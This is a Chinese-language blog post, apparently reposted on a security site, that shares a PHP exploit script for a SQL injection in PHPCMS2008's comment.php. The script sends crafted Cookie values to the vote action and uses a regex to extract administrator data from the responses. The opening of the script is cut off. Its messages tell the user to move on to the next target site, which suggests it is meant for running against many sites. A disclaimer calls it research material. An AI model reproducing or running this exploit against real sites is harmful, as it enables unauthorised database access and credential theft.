PHPCMS2008 comment.php 注入EXP

独自等待 2017年5月10日20:15:12评论372 views字数 378阅读1分15秒阅读模式

最近比较忙,一直没有时间更新博客,今天抽了点时间看了看乌云,看到了篇关于phpcms2008的老文章,文中提及了不少的EXP,发现其中的一些EXP我有的,但是也有一个没有,所以马上整了一个,把我没有的EXP也给整出来。。。。。写完了以后才发现,这个漏洞的利用其实还是需要cookie的,当时测试的网站是不需要cookie就可以利用,也懒得改了,反正现在phpcms2008的站也不多了。

漏洞EXP来源是这篇文章:http://www.wooyun.org/bugs/wooyun-2010-047476

作者是:pandas

注入EXP源码:

' . get_info($admin) . PHP_EOL;
    }
} else {
    echo '报告爷,此站不存在此漏洞,请秒下一个!' . PHP_EOL;
}
//发送数据包函数
function send_pack($exp)
{
    global $host, $path;
    $data = "GET " . $path . "/comment/comment.php?action=vote HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    //$data .= "User-Agent: Baiduspider\r\n";
    $data .= "Cookie: $exp\r\n";
    $data .= "Connection: Close\r\n\r\n";
    //echo $data;
    $fp = @fsockopen($host, 80, $errno, $errstr, 10);
    //echo ini_get('default_socket_timeout');//默认超时时间为60秒
    if (!$fp) {
        echo $errno . '-->' . $errstr . "\n";
        exit('Could not connect to: ' . $host);
    } else {
        fwrite($fp, $data);
        $back = '';
        while (!feof($fp)) {
            $back .= fread($fp, 1024);
        }
        fclose($fp);
    }
    return $back;
}

//提取返回信息
function get_info($info)
{
    preg_match('/~(.*)~1/i', send_pack($info), $admin_match);
    if (preg_match('/charset=utf-8/i', send_pack($info))) {
        return iconv('utf-8', 'gbk//IGNORE', $admin_match[1]);
    } else {
        return $admin_match[1];
    }
}

//时间统计函数
function func_time()
{
    list($microsec, $sec) = explode(' ', microtime());
    return $microsec + $sec;
}

echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒。';
?> 

执行EXP后的截图:

PHPCMS2008 comment.php 注入EXP

文中提及的另外几个EXP:

phpcms2008 preview.php 注入EXP

phpcms2008 c.php/js.php注入EXP



from www.waitalone.cn.thanks for it.

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
独自等待
  • 本文由 发表于 2017年5月10日20:15:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PHPCMS2008 comment.php 注入EXPhttps://cn-sec.com/archives/50119.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息